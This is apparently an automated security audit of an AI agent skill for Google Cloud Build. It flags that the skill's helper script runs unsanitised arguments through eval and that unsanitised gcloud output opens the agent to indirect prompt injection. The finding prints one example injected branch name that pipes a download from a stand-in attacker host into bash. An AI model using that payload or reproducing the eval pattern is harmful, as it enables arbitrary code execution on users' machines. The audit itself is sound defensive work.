gcp-cloudbuild
Fail
Audited by Gen Agent Trust Hub on Jun 24, 2026
Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The helper script
gcp-build-toolis vulnerable to command injection in thecmd_startfunction. The script constructs a shell command string by concatenating variables like$branch,$tag, and$substitutionswhich are taken directly from command-line arguments without sanitization or escaping. This string is then executed using theevalcommand. If an attacker can influence the parameters passed to the skill (e.g., via a prompt that results in a branch name likemain; curl http://attacker.com | bash), they can achieve arbitrary code execution on the host. - [COMMAND_EXECUTION]: The skill ingest data from external Google Cloud Platform APIs using
gcloudand processes it viajq. While GCP is a trusted service, the lack of output sanitization or boundary markers when handling trigger names, descriptions, or build statuses creates an attack surface for indirect prompt injection. - Ingestion points: Output from
gcloud builds triggers listandgcloud builds listingcp-build-tool. - Boundary markers: Absent in the instructions and the tool's output formatting.
- Capability inventory: Arbitrary shell command execution via the
evalvulnerability and general CLI access togcloudandjq. - Sanitization: Absent; the script uses
jqto extract values but subsequently executes them insecurely viaeval.
Recommendations
- AI detected serious security threats
Audit Metadata